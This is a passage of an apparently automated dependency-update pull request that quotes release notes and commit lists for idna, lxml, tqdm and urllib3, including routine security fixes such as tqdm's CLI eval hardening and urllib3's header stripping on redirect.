href=\"https://github.com/kjd/idna/commit/1b121483ed04d9576a1291758f537e1318cddc8b\"\u003e\u003ccode\u003e1b12148\u003c/code\u003e\u003c/a\u003e Update ossf/scorecard-action to v2.3.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/d516b874c3388047934938a500c7488d52c4e067\"\u003e\u003ccode\u003ed516b87\u003c/code\u003e\u003c/a\u003e Update Github actions/checkout to v4\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/c095c75943413c75ebf8ac74179757031b7f80b7\"\u003e\u003ccode\u003ec095c75\u003c/code\u003e\u003c/a\u003e Merge branch 'master' into dev\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/60a0a4cb61ec6834d74306bd8a1fa46daac94c98\"\u003e\u003ccode\u003e60a0a4c\u003c/code\u003e\u003c/a\u003e Fix typo in GitHub Actions workflow key\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/5918a0ef8034379c2e409ae93ee11d24295bb201\"\u003e\u003ccode\u003e5918a0e\u003c/code\u003e\u003c/a\u003e Merge branch 'master' into dev\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/kjd/idna/compare/v2.9...v3.7\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `lxml` from 4.5.0 to 4.9.1\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/lxml/lxml/blob/master/CHANGES.txt\"\u003elxml's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003e4.9.1 (2022-07-01)\u003c/h1\u003e\n\u003ch2\u003eBugs fixed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eA crash was resolved when using \u003ccode\u003eiterwalk()\u003c/code\u003e (or \u003ccode\u003ecanonicalize()\u003c/code\u003e)\nafter parsing certain incorrect input.  Note that \u003ccode\u003eiterwalk()\u003c/code\u003e can crash\non \u003cem\u003evalid\u003c/em\u003e input parsed with the same parser \u003cem\u003eafter\u003c/em\u003e failing to parse the\nincorrect input.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e4.9.0 (2022-06-01)\u003c/h1\u003e\n\u003ch2\u003eBugs fixed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eGH#341: The mixin inheritance order in \u003ccode\u003elxml.html\u003c/code\u003e was corrected.\nPatch by xmo-odoo.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eOther changes\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eBuilt with Cython 0.29.30 to adapt to changes in Python 3.11 and 3.12.\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eWheels include zlib 1.2.12, libxml2 2.9.14 and libxslt 1.1.35\n(libxml2 2.9.12+ and libxslt 1.1.34 on Windows).\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eGH#343: Windows-AArch64 build support in Visual Studio.\nPatch by Steve Dower.\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e4.8.0 (2022-02-17)\u003c/h1\u003e\n\u003ch2\u003eFeatures added\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eGH#337: Path-like objects are now supported throughout the API instead of just strings.\nPatch by Henning Janssen.\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eThe \u003ccode\u003eElementMaker\u003c/code\u003e now supports \u003ccode\u003eQName\u003c/code\u003e values as tags, which always override\nthe default namespace of the factory.\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eBugs fixed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eGH#338: In lxml.objectify, the XSI float annotation \u0026quot;nan\u0026quot; and \u0026quot;inf\u0026quot; were spelled in\nlower case, whereas XML Schema datatypes define them as \u0026quot;NaN\u0026quot; and \u0026quot;INF\u0026quot; respectively.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/lxml/lxml/commit/d01872ccdf7e1e5e825b6c6292b43e7d27ae5fc4\"\u003e\u003ccode\u003ed01872c\u003c/code\u003e\u003c/a\u003e Prevent parse failure in new test from leaking into later test runs.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/lxml/lxml/commit/d65e63229e8958bc08344a85cd3f09ceeef933c3\"\u003e\u003ccode\u003ed65e632\u003c/code\u003e\u003c/a\u003e Prepare release of lxml 4.9.1.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/lxml/lxml/commit/86368e9cf70a0ad23cccd5ee32de847149af0c6f\"\u003e\u003ccode\u003e86368e9\u003c/code\u003e\u003c/a\u003e Fix a crash when incorrect parser input occurs together with usages of iterwa...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/lxml/lxml/commit/50c276412880c1a3dde8a6d6c909e3ed8ef47e43\"\u003e\u003ccode\u003e50c2764\u003c/code\u003e\u003c/a\u003e Delete unused Travis CI config and reference in docs (\u003ca href=\"https://redirect.github.com/lxml/lxml/issues/345\"\u003eGH-345\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/lxml/lxml/commit/8f0bf2d158f2dd3f98d410c8a38fcd536fd11b53\"\u003e\u003ccode\u003e8f0bf2d\u003c/code\u003e\u003c/a\u003e Try to speed up the musllinux AArch64 build by splitting the different CPytho...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/lxml/lxml/commit/b9f7074430594b95824059eef931dfbb27a7645e\"\u003e\u003ccode\u003eb9f7074\u003c/code\u003e\u003c/a\u003e Remove debug print from test.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/lxml/lxml/commit/b224e0f69dde58425d1077e07d193d19d3f803a9\"\u003e\u003ccode\u003eb224e0f\u003c/code\u003e\u003c/a\u003e Try to install 'xz' in wheel builds, if available, since it's now needed to e...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/lxml/lxml/commit/897ebfa002fe5ec773ffe8851721047fedcc6928\"\u003e\u003ccode\u003e897ebfa\u003c/code\u003e\u003c/a\u003e Update macOS deployment target version from 10.14 to 10.15 since 10.14 starts...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/lxml/lxml/commit/853c9e9cbf1c82d1ad3c096362372a048108905e\"\u003e\u003ccode\u003e853c9e9\u003c/code\u003e\u003c/a\u003e Prepare release of 4.9.0.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/lxml/lxml/commit/d3f77e678a8394559331d27257714e8aa4b082f2\"\u003e\u003ccode\u003ed3f77e6\u003c/code\u003e\u003c/a\u003e Add a test for \u003ca href=\"https://bugs.launchpad.net/lxml/+bug/1965070\"\u003ehttps://bugs.launchpad.net/lxml/+bug/1965070\u003c/a\u003e leaving out the a...\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/lxml/lxml/compare/lxml-4.5.0...lxml-4.9.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `tqdm` from 4.46.0 to 4.66.3\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/tqdm/tqdm/releases\"\u003etqdm's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003etqdm v4.66.3 stable\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003ecli\u003c/code\u003e: \u003ccode\u003eeval\u003c/code\u003e safety (fixes CVE-2024-34062, GHSA-g7vv-2v7x-gj9p)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003etqdm v4.66.2 stable\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003epandas\u003c/code\u003e: add \u003ccode\u003eDataFrame.progress_map\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/tqdm/tqdm/issues/1549\"\u003e#1549\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003enotebook\u003c/code\u003e: fix HTML padding (\u003ca href=\"https://redirect.github.com/tqdm/tqdm/issues/1506\"\u003e#1506\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003ekeras\u003c/code\u003e: fix resuming training when \u003ccode\u003everbose\u0026gt;=2\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/tqdm/tqdm/issues/1508\"\u003e#1508\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003efix \u003ccode\u003eformat_num\u003c/code\u003e negative fractions missing leading zero (\u003ca href=\"https://redirect.github.com/tqdm/tqdm/issues/1548\"\u003e#1548\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003efix Python 3.12 \u003ccode\u003eDeprecationWarning\u003c/code\u003e on \u003ccode\u003eimport\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/tqdm/tqdm/issues/1519\"\u003e#1519\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003elinting: use f-strings (\u003ca href=\"https://redirect.github.com/tqdm/tqdm/issues/1549\"\u003e#1549\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eupdate tests (\u003ca href=\"https://redirect.github.com/tqdm/tqdm/issues/1549\"\u003e#1549\u003c/a\u003e)\n\u003cul\u003e\n\u003cli\u003efix \u003ccode\u003epandas\u003c/code\u003e warnings\u003c/li\u003e\n\u003cli\u003efix \u003ccode\u003easv\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/airspeed-velocity/asv/issues/1323\"\u003eairspeed-velocity/asv#1323\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003efix macos \u003ccode\u003enotebook\u003c/code\u003e docstring indentation\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003eCI: bump actions (\u003ca href=\"https://redirect.github.com/tqdm/tqdm/issues/1549\"\u003e#1549\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003etqdm v4.66.1 stable\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003efix \u003ccode\u003eutils.envwrap\u003c/code\u003e types (\u003ca href=\"https://redirect.github.com/tqdm/tqdm/issues/1493\"\u003e#1493\u003c/a\u003e \u0026lt;- \u003ca href=\"https://redirect.github.com/tqdm/tqdm/issues/1491\"\u003e#1491\u003c/a\u003e, \u003ca href=\"https://redirect.github.com/tqdm/tqdm/issues/1320\"\u003e#1320\u003c/a\u003e \u0026lt;- \u003ca href=\"https://redirect.github.com/tqdm/tqdm/issues/966\"\u003e#966\u003c/a\u003e, \u003ca href=\"https://redirect.github.com/tqdm/tqdm/issues/1319\"\u003e#1319\u003c/a\u003e)\n\u003cul\u003e\n\u003cli\u003ee.g. cloudwatch \u0026amp; kubernetes workaround: \u003ccode\u003eexport TQDM_POSITION=-1\u003c/code\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003edrop mentions of unsupported Python versions\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003etqdm v4.66.0 stable\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eenvironment variables to override defaults (\u003ccode\u003eTQDM_*\u003c/code\u003e) (\u003ca href=\"https://redirect.github.com/tqdm/tqdm/issues/1491\"\u003e#1491\u003c/a\u003e \u0026lt;- \u003ca href=\"https://redirect.github.com/tqdm/tqdm/issues/1061\"\u003e#1061\u003c/a\u003e, \u003ca href=\"https://redirect.github.com/tqdm/tqdm/issues/950\"\u003e#950\u003c/a\u003e \u0026lt;- \u003ca href=\"https://redirect.github.com/tqdm/tqdm/issues/614\"\u003e#614\u003c/a\u003e, \u003ca href=\"https://redirect.github.com/tqdm/tqdm/issues/1318\"\u003e#1318\u003c/a\u003e, \u003ca href=\"https://redirect.github.com/tqdm/tqdm/issues/619\"\u003e#619\u003c/a\u003e, \u003ca href=\"https://redirect.github.com/tqdm/tqdm/issues/612\"\u003e#612\u003c/a\u003e, \u003ca href=\"https://redirect.github.com/tqdm/tqdm/issues/370\"\u003e#370\u003c/a\u003e)\n\u003cul\u003e\n\u003cli\u003ee.g. in CI jobs, \u003ccode\u003eexport TQDM_MININTERVAL=5\u003c/code\u003e to avoid log spam\u003c/li\u003e\n\u003cli\u003eadd tests \u0026amp; docs for \u003ccode\u003etqdm.utils.envwrap\u003c/code\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003efix \u0026amp; update CLI completion\u003c/li\u003e\n\u003cli\u003efix \u0026amp; update API docs\u003c/li\u003e\n\u003cli\u003eminor code tidy: replace \u003ccode\u003eos.path\u003c/code\u003e =\u0026gt; \u003ccode\u003epathlib.Path\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003efix docs image hosting\u003c/li\u003e\n\u003cli\u003erelease with CI bot account again (\u003ca href=\"https://redirect.github.com/cli/cli/issues/6680\"\u003ecli/cli#6680\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003etqdm v4.65.2 stable\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eexclude \u003ccode\u003eexamples\u003c/code\u003e from distributed wheel (\u003ca href=\"https://redirect.github.com/tqdm/tqdm/issues/1492\"\u003e#1492\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003etqdm v4.65.1 stable\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003emigrate \u003ccode\u003esetup.{cfg,py}\u003c/code\u003e =\u0026gt; \u003ccode\u003epyproject.toml\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/tqdm/tqdm/issues/1490\"\u003e#1490\u003c/a\u003e)\n\u003cul\u003e\n\u003cli\u003efix \u003ccode\u003easv\u003c/code\u003e benchmarks\u003c/li\u003e\n\u003cli\u003eupdate docs\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003efix snap build (\u003ca href=\"https://redirect.github.com/tqdm/tqdm/issues/1490\"\u003e#1490\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003efix \u0026amp; update tests (\u003ca href=\"https://redirect.github.com/tqdm/tqdm/issues/1490\"\u003e#1490\u003c/a\u003e)\n\u003cul\u003e\n\u003cli\u003efix flaky notebook tests\u003c/li\u003e\n\u003cli\u003ebump \u003ccode\u003epre-commit\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003ebump workflow actions\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003etqdm v4.65.0 stable\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eadd Python 3.11 and drop Python 3.6 support (\u003ca href=\"https://redirect.github.com/tqdm/tqdm/issues/1439\"\u003e#1439\u003c/a\u003e, \u003ca href=\"https://redirect.github.com/tqdm/tqdm/issues/1419\"\u003e#1419\u003c/a\u003e, \u003ca href=\"https://redirect.github.com/tqdm/tqdm/issues/502\"\u003e#502\u003c/a\u003e \u0026lt;- \u003ca href=\"https://redirect.github.com/tqdm/tqdm/issues/720\"\u003e#720\u003c/a\u003e, \u003ca href=\"https://redirect.github.com/tqdm/tqdm/issues/620\"\u003e#620\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003emisc code \u0026amp; docs tidy\u003c/li\u003e\n\u003cli\u003efix \u0026amp; update CI workflows \u0026amp; tests\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003etqdm v4.64.1 stable\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/tqdm/tqdm/commit/4e613f84ed2ae029559f539464df83fa91feb316\"\u003e\u003ccode\u003e4e613f8\u003c/code\u003e\u003c/a\u003e Merge pull request from GHSA-g7vv-2v7x-gj9p\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/tqdm/tqdm/commit/b53348c73080b4edeb30b4823d1fa0d8d2c06721\"\u003e\u003ccode\u003eb53348c\u003c/code\u003e\u003c/a\u003e cli: eval safety\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/tqdm/tqdm/commit/cc372d09dcd5a5eabdc6ed4cf365bdb0be004d44\"\u003e\u003ccode\u003ecc372d0\u003c/code\u003e\u003c/a\u003e bump version, merge pull request \u003ca href=\"https://redirect.github.com/tqdm/tqdm/issues/1549\"\u003e#1549\u003c/a\u003e from tqdm/devel\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/tqdm/tqdm/commit/e9f0c05097dc167031575391d83240d37556f098\"\u003e\u003ccode\u003ee9f0c05\u003c/code\u003e\u003c/a\u003e use PyPI trusted publishing\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/tqdm/tqdm/commit/7323d5bcc9b032d525f9d6468a9713f5be9c4174\"\u003e\u003ccode\u003e7323d5b\u003c/code\u003e\u003c/a\u003e slight makefile clean\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/tqdm/tqdm/commit/5306125133d76e0f9326d747d29781fefe273c77\"\u003e\u003ccode\u003e5306125\u003c/code\u003e\u003c/a\u003e tests: bump pre-commit\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/tqdm/tqdm/commit/4a6fd4f690a4add231f4bef601521ed9bee513fb\"\u003e\u003ccode\u003e4a6fd4f\u003c/code\u003e\u003c/a\u003e fix datetime.utcfromtimestamp py3.12 warning (\u003ca href=\"https://redirect.github.com/tqdm/tqdm/issues/1519\"\u003e#1519\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/tqdm/tqdm/commit/6f13759f4a0e1047a09732e72f6d07e44d3e6855\"\u003e\u003ccode\u003e6f13759\u003c/code\u003e\u003c/a\u003e tests: fix macos notebook indentation\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/tqdm/tqdm/commit/3abcd2ac90ecb01ac7f64071af600f803eab6a21\"\u003e\u003ccode\u003e3abcd2a\u003c/code\u003e\u003c/a\u003e tests: fix asv\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/tqdm/tqdm/commit/a4d15c8e2f6c7322c1a1cd1d845927f037281da1\"\u003e\u003ccode\u003ea4d15c8\u003c/code\u003e\u003c/a\u003e tests: fix pandas warnings\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/tqdm/tqdm/compare/v4.46.0...v4.66.3\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `urllib3` from 1.25.9 to 1.26.19\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/urllib3/urllib3/releases\"\u003eurllib3's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e1.26.19\u003c/h2\u003e\n\u003ch2\u003e🚀 urllib3 is fundraising for HTTP/2 support\u003c/h2\u003e\n\u003cp\u003e\u003ca href=\"https://sethmlarson.dev/urllib3-is-fundraising-for-http2-support\"\u003eurllib3 is raising ~$40,000 USD\u003c/a\u003e to release HTTP/2 support and ensure long-term sustainable maintenance of the project after a sharp decline in financial support for 2023. If your company or organization uses Python and would benefit from HTTP/2 support in Requests, pip, cloud SDKs, and thousands of other projects \u003ca href=\"https://opencollective.com/urllib3\"\u003eplease consider contributing financially\u003c/a\u003e to ensure HTTP/2 support is developed sustainably and maintained for the long-haul.\u003c/p\u003e\n\u003cp\u003eThank you for your support.\u003c/p\u003e\n\u003ch2\u003eChanges\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAdded the \u003ccode\u003eProxy-Authorization\u003c/code\u003e header to the list of headers to strip from requests when redirecting to a different host. As before, different headers can be set via \u003ccode\u003eRetry.remove_headers_on_redirect\u003c/code\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/urllib3/urllib3/compare/1.26.18...1.26.19\"\u003ehttps://github.com/urllib3/urllib3/compare/1.26.18...1.26.19\u003c/a\u003e\u003c/p\u003e\n\u003cp\u003eNote that due to an issue with our release automation, no \u003ccode\u003e multiple.intoto.jsonl\u003c/code\u003e file is available for this release.\u003c/p\u003e\n\u003ch2\u003e1.26.18\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMade body stripped from HTTP requests changing the request method to GET after HTTP 303 \u0026quot;See Other\u0026quot; redirect responses. (GHSA-g4mx-q9vg-27p4)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e1.26.17\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAdded the \u003ccode\u003eCookie\u003c/code\u003e header to the list of headers to strip from requests when redirecting to a different host. As before, different headers can be set via \u003ccode\u003eRetry.remove_headers_on_redirect\u003c/code\u003e. (GHSA-v845-jxx5-vc9f)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e1.26.16\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFixed thread-safety issue where accessing a \u003ccode\u003ePoolManager\u003c/code\u003e with many distinct origins would cause connection pools to be closed while requests are in progress (\u003ca href=\"https://redirect.github.com/urllib3/urllib3/issues/2954\"\u003e#2954\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e1.26.15\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFix socket timeout value when HTTPConnection is reused (\u003ca href=\"https://redirect.github.com/urllib3/urllib3/issues/2645\"\u003eurllib3/urllib3#2645\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eRemove \u0026quot;!\u0026quot; character from the unreserved characters in IPv6 Zone ID parsing (\u003ca href=\"https://redirect.github.com/urllib3/urllib3/issues/2899\"\u003eurllib3/urllib3#2899\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFix IDNA handling of 'x80' byte (\u003ca href=\"https://redirect.github.com/urllib3/urllib3/issues/2901\"\u003eurllib3/urllib3#2901\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e1.26.14\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFixed parsing of port 0 (zero) returning None, instead of 0 (\u003ca href=\"https://redirect.github.com/urllib3/urllib3/issues/2850\"\u003e#2850\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eRemoved deprecated \u003ccode\u003eHTTPResponse.getheaders()\u003c/code\u003e calls in \u003ccode\u003eurllib3.contrib\u003c/code\u003e module.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e1.26.13\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeprecated the \u003ccode\u003eHTTPResponse.getheaders()\u003c/code\u003e and \u003ccode\u003eHTTPResponse.getheader()\u003c/code\u003e methods.\u003c/li\u003e\n\u003cli\u003eFixed an issue where parsing a URL with leading zeroes in the port would be rejected even when the port number after removing the zeroes was valid.\u003c/li\u003e\n\u003cli\u003eFixed a deprecation warning when using cryptography v39.0.0.\u003c/li\u003e\n\u003cli\u003eRemoved the \u003ccode\u003e\u0026lt;4\u003c/code\u003e in the \u003ccode\u003eRequires-Python\u003c/code\u003e packaging metadata field.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e1.26.12\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeprecated the \u003ccode\u003eurllib3[secure]\u003c/code\u003e extra and the \u003ccode\u003eurllib3.contrib.pyopenssl\u003c/code\u003e module. Both will be removed in v2.x. See this \u003ca href=\"https://redirect.github.com/urllib3/urllib3/issues/2680\"\u003eGitHub issue\u003c/a\u003e for justification and info on how to migrate.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e1.26.11\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eIf you or your organization rely on urllib3 consider supporting us via \u003ca href=\"https://github.com/sponsors/urllib3\"\u003eGitHub Sponsors\u003c/a\u003e.\u003c/strong\u003e\u003c/p\u003e\n\u003cp\u003e:warning: \u003cstrong\u003eurllib3 v2.0 will drop support for Python 2\u003c/strong\u003e: \u003ca href=\"https://urllib3.readthedocs.io/en/latest/v2-roadmap.html\"\u003eRead more in the v2.0 Roadmap\u003c/a\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eFixed an issue where reading more than 2 GiB in a call to HTTPResponse.read would raise an OverflowError on Python 3.9 and earlier.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/urllib3/urllib3/blob/main/CHANGES.rst\"\u003eurllib3's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003e1.26.19 (2024-06-17)\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eAdded the \u003ccode\u003eProxy-Authorization\u003c/code\u003e header to the list of headers to strip from requests when redirecting to a different host. As before, different headers can be set via \u003ccode\u003eRetry.remove_headers_on_redirect\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eFixed handling of OpenSSL 3.2.0 new error message for misconfiguring an HTTP proxy as HTTPS. (\u003ccode\u003e[#3405](https://github.com/urllib3/urllib3/issues/3405) \u0026lt;https://github.com/urllib3/urllib3/issues/3405\u0026gt;\u003c/code\u003e__)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e1.26.18 (2023-10-17)\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eMade body stripped from HTTP requests changing the request method to GET after HTTP 303 \u0026quot;See Other\u0026quot; redirect responses.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e1.26.17 (2023-10-02)\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eAdded the \u003ccode\u003eCookie\u003c/code\u003e header to the list of headers to strip from requests when redirecting to a different host. As before, different headers can be set via \u003ccode\u003eRetry.remove_headers_on_redirect\u003c/code\u003e. (\u003ccode\u003e[#3139](https://github.com/urllib3/urllib3/issues/3139) \u0026lt;https://github.com/urllib3/urllib3/pull/3139\u0026gt;\u003c/code\u003e_)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e1.26.16 (2023-05-23)\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eFixed thread-safety issue where accessing a \u003ccode\u003ePoolManager\u003c/code\u003e with many distinct origins\nwould cause connection pools to be closed while requests are in progress (\u003ccode\u003e[#2954](https://github.com/urllib3/urllib3/issues/2954) \u0026lt;https://github.com/urllib3/urllib3/pull/2954\u0026gt;\u003c/code\u003e_)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e1.26.15 (2023-03-10)\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eFix socket timeout value when \u003ccode\u003eHTTPConnection\u003c/code\u003e is reused (\u003ccode\u003e[#2645](https://github.com/urllib3/urllib3/issues/2645) \u0026lt;https://github.com/urllib3/urllib3/issues/2645\u0026gt;\u003c/code\u003e__)\u003c/li\u003e\n\u003cli\u003eRemove \u0026quot;!\u0026quot; character from the unreserved characters in IPv6 Zone ID parsing\n(\u003ccode\u003e[#2899](https://github.com/urllib3/urllib3/issues/2899) \u0026lt;https://github.com/urllib3/urllib3/issues/2899\u0026gt;\u003c/code\u003e__)\u003c/li\u003e\n\u003cli\u003eFix IDNA handling of '\\x80' byte (\u003ccode\u003e[#2901](https://github.com/urllib3/urllib3/issues/2901) \u0026lt;https://github.com/urllib3/urllib3/issues/2901\u0026gt;\u003c/code\u003e__)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e1.26.14 (2023-01-11)\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eFixed parsing of port 0 (zero) returning None, instead of 0. (\u003ccode\u003e[#2850](https://github.com/urllib3/urllib3/issues/2850) \u0026lt;https://github.com/urllib3/urllib3/issues/2850\u0026gt;\u003c/code\u003e__)\u003c/li\u003e\n\u003cli\u003eRemoved deprecated getheaders() calls in contrib module. Fixed the type hint of \u003ccode\u003ePoolKey.key_retries\u003c/code\u003e by adding \u003ccode\u003ebool\u003c/code\u003e to the union. (\u003ccode\u003e[#2865](https://github.com/urllib3/urllib3/issues/2865) \u0026lt;https://github.com/urllib3/urllib3/issues/2865\u0026gt;\u003c/code\u003e__)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e1.26.13 